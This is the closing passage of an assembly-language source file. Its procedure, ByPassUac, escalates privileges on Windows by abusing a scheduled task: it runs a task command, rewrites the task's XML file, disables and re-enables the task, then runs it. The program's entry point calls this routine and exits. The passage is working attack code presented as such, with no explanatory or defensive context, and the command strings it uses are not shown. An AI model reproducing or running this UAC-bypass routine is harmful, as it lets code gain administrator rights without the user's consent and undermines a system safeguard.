    mov eInfo.lpParameters,eax
    invoke ShellExecuteEx,addr eInfo
    invoke WaitForSingleObject,eInfo.hProcess,INFINITE

    ; rewrite the task's XML file
    invoke ConfigXmlFile,addr FilePath

    ; disable, then re-enable the task
    mov eInfo.lpParameters,offset g_TaskDisable
    invoke ShellExecuteEx,addr eInfo
    invoke WaitForSingleObject,eInfo.hProcess,INFINITE
    mov eInfo.lpParameters,offset g_TaskEnable
    invoke ShellExecuteEx,addr eInfo
    invoke WaitForSingleObject,eInfo.hProcess,INFINITE

    ; run the task
    mov eInfo.lpParameters,offset g_TaskRun
    invoke ShellExecuteEx,addr eInfo
    invoke WaitForSingleObject,eInfo.hProcess,INFINITE
    ret
ByPassUac endp

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Program entry point: run ByPassUac once, then exit with code 0.
; The trailing "ret" is unreachable after ExitProcess.
;<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
start:
    invoke ByPassUac
    invoke ExitProcess,0
    ret
end start